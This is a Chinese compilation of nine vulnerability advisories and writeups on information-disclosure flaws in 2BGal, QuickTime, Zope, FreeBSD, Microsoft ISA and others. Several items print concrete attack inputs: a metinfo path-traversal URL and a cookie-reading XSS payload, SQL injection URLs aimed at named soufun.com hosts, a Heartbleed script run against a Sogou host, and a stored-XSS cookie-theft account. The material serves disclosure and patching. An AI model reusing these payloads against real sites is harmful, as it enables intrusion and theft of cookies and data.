“法音”通过精心收集,向本站投稿了9篇2Bgal admin/phpinfo.php脚本信息泄露漏洞,以下文章小编为您整理后的2Bgal admin/phpinfo.php脚本信息泄露漏洞,供大家阅读。

篇1:2Bgal admin/phpinfo.php脚本信息泄露漏洞
影响版本:
2Bgal 3.1.2
程序介绍:
2BGal是用于发布照片、相册的PHP/MySQL脚本,
漏洞分析:
2BGal的admin/phpinfo.php脚本对phpinfo函数的调用是公开可访问的,远程攻击者可以通过直接请求文件泄露PHP配置信息。
解决方案:
厂商补丁:
Ben3w
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.ben3w.com/multimedia/devphp_2bgal.php
链接:secunia.com/advisories/35586/
*>
篇2:Apple QuickTime信息泄露漏洞漏洞预警
发布日期:-10-28
更新日期:2011-10-28
受影响系统:
Apple QuickTime Player 7.x
不受影响系统:
Apple QuickTime Player 7.7.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 50130
CVE ID: CVE-2011-3220
QuickTime是由苹果电脑所开发的一种多媒体架构,能够处理许多的数字视频、媒体段落、音效、文字、动画、音乐格式,以及交互式全景影像的数项类型,
Apple QuickTime信息泄露漏洞漏洞预警
,
Apple QuickTime在处理视频文件中的URL数据处理程序时存在未初始化内存访问问题,攻击者可利用此漏洞读取内存内容。
链接:support.apple.com/kb/HT5016
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
support.apple.com/
篇3:Zope CSVTable远程文件信息泄露漏洞
受影响系统:Debian Linux 3.1
Zope Zope 2.8.8
Zope Zope 2.7.5描述:
BUGTRAQ ID: 2CVE(CAN) ID: CVE--4684
Zope是一款基于Python的开放源代码内容管理系统服务程序,
Zope在处理网页标记时存在漏洞,远程攻击者可能利用此漏洞非授权访问文件。
Zope没有在包含有ReST标记的Web页面中禁用csv_table指令,导致泄漏Zope服务器可读的文件。
链接:www.debian.org/security//dsa-1176
*>
建议:
厂商补丁:Debian
------
Debian已经为此发布了一个安全公告(DSA-1176-1)以及相应补丁:
DSA-1176-1:New zope2.7 packages fix information disclosure
链接:www.debian.org/security/2005/dsa-1176
补丁下载:
Source archives:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3.dsc
Size/MD5 checksum: 906 b4ea5636227d16c5df630894d2b76967
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3.diff.gz
Size/MD5 checksum: 51399 ee75bf3e88b6eb161ccc431e1077bce8
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5.orig.tar.gz
Size/MD5 checksum: 2885871 5b5c5823c62370d9f7325c6014a49d8b
Alpha architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_alpha.deb
Size/MD5 checksum: 2669566 2c4d8fb2ac3e9dba4f7de9caf0868b51
AMD64 architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_amd64.deb
Size/MD5 checksum: 2661080 8108a298111e6abad30073cbd002093e
ARM architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_arm.deb
Size/MD5 checksum: 2616068 9d77c1ccce693668a3a7e2bb0f35491d
HP Precision architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_hppa.deb
Size/MD5 checksum: 2736774 1fd5611ff6fa57d561b15bae9d836fe7
Intel IA-32 architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_i386.deb
Size/MD5 checksum: 2608554 779c9e75c919a1d39d0db7a9a6fc14d9
Intel IA-64 architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_ia64.deb
Size/MD5 checksum: 2959538 d800e88a7a988d9bb0db833df57f074a
Motorola 680x0 architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_m68k.deb
Size/MD5 checksum: 2601510 cdd9b090bf745ab74545361936b415c8
Big endian MIPS architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_mips.deb
Size/MD5 checksum: 2675666 260205e53eb3802ad50c4adcc8ac0d5f
Little endian MIPS architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_mipsel.deb
Size/MD5 checksum: 2678458 dc9af18e0027a9fb7ae507ff33e050b9
PowerPC architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_powerpc.deb
Size/MD5 checksum: 2723958 90e0b09a7f8d299a60c09947b86a72e5
IBM S/390 architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_s390.deb
Size/MD5 checksum: 2663150 a5f76f5bc20b8fde2ed6ffcf24dffa33
Sun Sparc architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_sparc.deb
Size/MD5 checksum: 2670708 66e3bd2e47d38d33bf951711e59f7592
补丁安装方法:
1. 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb (file是相应的补丁名)
2. 使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
# apt-get update
然后,使用下面的命令安装更新软件包:
# apt-get upgrade
篇4:metinfo3.0 敏感信息泄露与跨站漏洞及修复
metinfo企业网站管理系统是一个功能完善的营销型企业网站管理平台,PHP+MYSQL架构的,在设计的时候出现两个错误,敏感信息泄露与跨站。
metinfo3.0 文件代码泄露
EXp :localhost/metinfo/templates/met001/../../config
metinfo3.0 XSS 跨站漏洞
exploit :
alert(document.cookie)localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1
修复:暂时过滤等待官方升级
篇5:搜房网多个分站存在注射漏洞及敏感信息泄露
简要描述:注射可导致主机相关信息泄露,以及进一步的渗透,望管理员及时修复,以免造成对主机安全影响。
详细说明:1、
njbbs.soufun.com/zhuanti/njxn/njxnvote.asp
?num=259%0Aand%0A1=2%0AUNION%0Aall%0ASELECT%0A1,2,9999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%0Afrom%0AMSysAccessObjects
2、
nree.soufun.com/spring/guangzhou/show2.asp
?id=7%0D%0D%0DAnd%0D1=2%0DUNION%0Dall%0DSELECT%0D1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%0Dfrom%0DMSysAccessObjects
3、
dg.soufun.com/zhuanti/yht/view.asp?p_id=13&class_id=21&id=262 or 1=1
4、
szesftest.soufun.com/sechouse2/products.asp
?BigClassName=%B6%FE%CA%D6%B7%BF
&SmallClassName=%D5%D0%C9%CC%D6%C3%D2%B5' and '1'='1
漏洞证明:1、
njbbs.soufun.com/zhuanti/njxn/njxnvote.asp
?num=259%0Aand%0A1=2%0AUNION%0Aall%0ASELECT%0A1,2,9999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%0Afrom%0AMSysAccessObjects
2、
nree.soufun.com/2007spring/guangzhou/show2.asp
?id=7%0D%0D%0DAnd%0D1=2%0DUNION%0Dall%0DSELECT%0D1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%0Dfrom%0DMSysAccessObjects
3、
dg.soufun.com/zhuanti/yht/view.asp?p_id=13&class_id=21&id=262 or 1=1
4、
szesftest.soufun.com/sechouse2/products.asp
?BigClassName=%B6%FE%CA%D6%B7%BF
&SmallClassName=%D5%D0%C9%CC%D6%C3%D2%B5' and '1'='1
www.soufun.com/space/Other/Posts.aspx?userid=5469987
泄露信息主机路径:
Source File: e:\soufun\spacen.soufun.com\Other\Posts.aspx Line: 6
Line 4: <%@ MasterType VirtualPath=“~/Visit.Master” %>
Line 5:
Line 6: <%=Master.visitUser.UserName%>- 家庭空间- 搜房网
Line 7:
Line 8:
修复方案:过滤
作者 孤狐浪子
篇6:FreeBSD openpty pty处理多个本地信息泄露漏洞
受影响系统:FreeBSD FreeBSD 7.0FreeBSD FreeBSD 6.3FreeBSD FreeBSD 6.2FreeBSD FreeBSD 6.1FreeBSD FreeBSD 5.5FreeBSD FreeBSD 5.0描述:FreeBSD就是一种运行在Intel平台上、可以自由使用的开放源码Unix类系统,FreeBSD在处理pty的
受影响系统:FreeBSD FreeBSD 7.0
FreeBSD FreeBSD 6.3
FreeBSD FreeBSD 6.2
FreeBSD FreeBSD 6.1
FreeBSD FreeBSD 5.5
FreeBSD FreeBSD 5.0描述:
FreeBSD就是一种运行在Intel平台上、可以自由使用的开放源码Unix类系统,
FreeBSD在处理pty的权限时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。FreeBSD的openpty函数在为打开的伪终端设置权限时存在错误,恶意的本地用户可以通过执行内部调用了openpty()的程序从非 root用户所打开的pty读取文本;此外ptsname(3)函数错误的从/dev中的设备节点名获得了两个字符,但没有核实是否在操作调用用户所拥有的有效pty。pt_chown使用了ptsname(3)的错误结果将pty的所有权更改到调用pt_chown的用户,这样本地用户就可以获得正常情况下应受限的所有权。厂商补丁:
FreeBSD已经为此发布了一个安全公告(FreeBSD-SA-08:01)以及相应补丁:
FreeBSD-SA-08:01:pty snooping
链接:ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-08:01.pty.asc
篇7:微软发服务器软件补丁 漏洞被利用泄露信息
微软公司9 日说,微软服务器软件内含一个弱点,可能遭 利用,导致商务使用者误上贼船,甚至泄露个人信息,微软已发布修补程序解决此问题。
这项弱点影响微软的互联网安全与加速(ISA )服务器软件,此软件兼具防火墙、内容过滤器和网页内容缓存的功用。该软件除了当作独立产品销售外,也并入微软小企业服务器套装软件(Small Business Server )出售。
微软Proxy Server 2.0产品也受影响。
微软把此安全漏洞的警戒层级评为次高的“重要”级,并发布修补程序。
微软在例行发布的资安月报中声明:“使用者可能以为存取的是受信赖的互联网内容,但其实存取的却是恶意网络内容,例如包藏祸心的网站。”
此瑕疵影响ISA 服务器的一种功能:缓存(cache )网页内容以加速存取经常造访网站。此功能把甲职员曾造访网站上的大形图文文件存在缓存内存内,一旦乙职员上相同的网站,图文就会立刻呈现出来。但ISA 安全漏洞可能让 在缓存内存内插入恶意的内容,例如仿冒的表格,并更改内容标示,比方说把它重新标明为传自某银行网站的表格,
防毒软件公司赛门铁克(Symantec)提醒企业当心,ISA 的这项安全漏洞可能被有心人士用来窃取顾客的私密信息。把使用者诱上某恶意网站后, 可能伪造表格,佯装成传自正宗的网域。
要提防这类威胁,赛门铁克建议使用者,切勿点选通往不知名网站的链接。
“随着网络钓鱼(phishing)攻击愈来愈猖獗,此弱点可能提供另一个收集身分信息的平台,”赛门铁克安全应变中心资深经理Oliver Friedrichs说。
微软从一年前开始每月发布资安公告,本月公布的瑕疵仅ISA 服务器一项,比以往大有改善。10月份微软同一天就公布20多项软件瑕疵。
此瑕疵不影响ISA Server 。至于受影响的ISA Server 2000 和Proxy Server 2.0,微软建议系统管理员安装最新修补程序,或把受影响系统上的网域名称服务(DNS )缓存设定值改为零,即可预防 利用此瑕疵作怪。
篇8:搜狗通行证服务器运维不当导致信息泄露漏洞预警
,
这里搜狗通行证可以读取到cookie的内容,所以还是很重要的。
python openssl.py account.sogou.com
修复方案:
1、只影响 openssl 1.0.1 到 1.0.1f 版本,还有 openssl 1.0.2 beta 版本,其他版本不受影响,不受影响的版本不需要进行修复
2、1.0.1g 版本已经修复该漏洞,如果服务器上 openssl 版本存在该漏洞请升级到这个版本
篇9:快用苹果助手Xss进后台导致信息泄露脚本安全
简要描述:
快用苹果助手,存在储存型XSS,秒偷cookie进后台,
详细说明:
注册一个开发者合作帐号。
创建一个应用
developer.kuaiyong.com/app.php?do=app_add
抓包修改,在应用名称后加入Xss测试代码;
提交之后
然后我去倒了杯水,cookie就到了,
alt=“2.jpg” />
紧接着
漏洞证明:
信息泄露
修复方案:
过滤、一定要过滤







